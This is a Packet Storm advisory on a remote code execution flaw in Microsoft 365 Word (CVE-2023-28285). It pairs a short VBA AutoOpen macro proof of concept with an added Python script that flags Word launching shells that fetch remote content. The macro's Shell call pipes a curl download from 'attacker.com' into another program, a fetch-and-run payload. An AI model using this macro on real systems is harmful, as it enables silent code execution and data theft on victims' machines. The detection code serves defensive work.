Source: packetstorm | Author: Nu11secur1ty | ID: PACKETSTORM:173140
History: Jun 27, 2023 - 12:00 a.m.

Microsoft 365 MSO 2305 Build 16.0.16501.20074 Remote Code Execution


EPSS: 0.138 (percentile: 95.7%)

`## Title: Microsoft 365 MSO (Version 2305 Build 16.0.16501.20074)  
64-bit Remote Code Execution Vulnerability  
## Author: nu11secur1ty  
## Date: 04.17.2023  
## Vendor: https://www.microsoft.com/  
## Software: https://www.microsoft.com/en-us/microsoft-365/  
## Reference: https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/  
## CVE-2023-28285  
  
  
## Description:  
The attack itself is carried out locally by a user with authentication  
to the targeted system. An attacker could exploit the vulnerability by  
convincing a victim, through social engineering, to download and open  
a specially crafted file from a website, which could lead to a local  
attack on the victim's computer. The attacker can trick the victim into  
opening a malicious web page by using a malicious `Word` file for the  
`Office-365 API`. When the user opens the file to read it through the  
Office-365 API, he activates the code from the malicious server without  
being asked what he wants to activate, injecting it himself from that  
server. Immediately after this click, the attacker can receive very  
sensitive information: bank account data, logs from sniffing attacks,  
continuous tracking of all of the victim's traffic, and more, depending  
on the scenario.  
STATUS: HIGH Vulnerability  
  
[+]Exploit:  
The exploit server must be BROADCASTING at the moment when the victim  
hits the button of the exploit!  
  
[+]PoC:  
```vba  
' AutoOpen runs automatically when the document is opened
Sub AutoOpen()
Call Shell("cmd.exe /S /c" & "curl -s http://attacker.com/CVE-2023-28285/PoC.debelui | debelui", vbNormalFocus)
End Sub
```  
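
One way to hunt for the behaviour this PoC produces (Word launching `cmd.exe`, which fetches remote content and pipes it onward) in process-creation telemetry. This is an added example, not code from the advisory or its author; the event fields follow Sysmon Event ID 1 naming, and the sample events, the `example.invalid` URLs and the `triage` helper are constructed for illustration.

```python
import re

# Office applications whose child processes deserve inspection.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
# Shells and script hosts that a macro's Shell() call typically launches.
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# No leading \b: the PoC concatenates "/c" & "curl", so the log shows "/ccurl".
FETCH = re.compile(r"(?:curl|wget|certutil|bitsadmin|invoke-webrequest)\b", re.I)
URL = re.compile(r"https?://[^\s\"'|]+", re.I)


def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(event):
    """Return (severity, reasons) for one process-creation event dict."""
    parent = basename(event.get("ParentImage", ""))
    child = basename(event.get("Image", ""))
    if parent not in OFFICE_PARENTS or child not in SHELL_CHILDREN:
        return "none", []
    reasons = ["office application spawned a shell"]
    cmdline = event.get("CommandLine", "")
    if FETCH.search(cmdline):
        reasons.append("command line fetches remote content")
    url = URL.search(cmdline)
    if url:
        reasons.append("url: " + url.group(0))
    if "|" in cmdline:
        reasons.append("output piped to another program")
    # Lineage alone is worth a look; lineage plus fetch/pipe traits is urgent.
    return ("high" if len(reasons) >= 3 else "medium"), reasons


# Constructed sample events (Sysmon Event ID 1 field names, not real telemetry).
WORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
CMD = r"C:\Windows\System32\cmd.exe"
EVENTS = [
    {"ParentImage": WORD, "Image": CMD,
     "CommandLine": "cmd.exe /S /ccurl -s http://example.invalid/PoC.bin | runner"},
    {"ParentImage": WORD, "Image": CMD, "CommandLine": "cmd.exe /c dir"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": CMD,
     "CommandLine": "cmd.exe /c curl -s http://example.invalid/readme.txt"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(triage(ev))
```
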
  
## FYI:  
The PoC has a price, and this report will be uploaded only with a  
description and a video of how you can reproduce it.  
  
## Reproduce:  
[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28285)  
  
## Proof and Exploit  
[href](https://www.nu11secur1ty.com/2023/04/cve-2023-28285-microsoft-office-remote.html)  
  
## Time spent:  
01:30:00  
  
  
--   
System Administrator - Infrastructure Engineer  
Penetration Testing Engineer  
Exploit developer at https://packetstormsecurity.com/  
https://cve.mitre.org/index.html  
https://cxsecurity.com/ and https://www.exploit-db.com/  
0day Exploit DataBase https://0day.today/  
home page: https://www.nu11secur1ty.com/  
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=  
nu11secur1ty <http://nu11secur1ty.com/>  
  
  
`